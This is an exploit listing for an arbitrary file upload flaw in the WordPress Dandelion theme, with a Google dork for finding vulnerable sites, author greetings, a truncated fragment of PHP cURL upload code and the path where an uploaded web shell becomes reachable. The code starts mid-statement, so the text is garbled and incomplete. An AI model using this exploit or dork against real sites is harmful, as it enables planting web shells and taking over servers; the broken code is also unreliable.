# Exploit Title: Wordpress Dandelion Themes Arbitry File Upload # Google Dork: inurl:/wp-content/themes/dandelion/ # Date: 31/01/2014 # Exploit Author: TheBlackMonster (Marouane) # Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628 # Software Link: Not Available # Version: Web Application # Tested on: Mozilla, Chrome, Opera -> Windows & Linux ‪#‎Greetz‬ : PhantomGhost, Deto Beiber, All Moroccan Hackers. We are Moroccans, we are genuis ! "@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> File Access : http://127.0.0.1/uploads/[years]/[month]/your_shell.php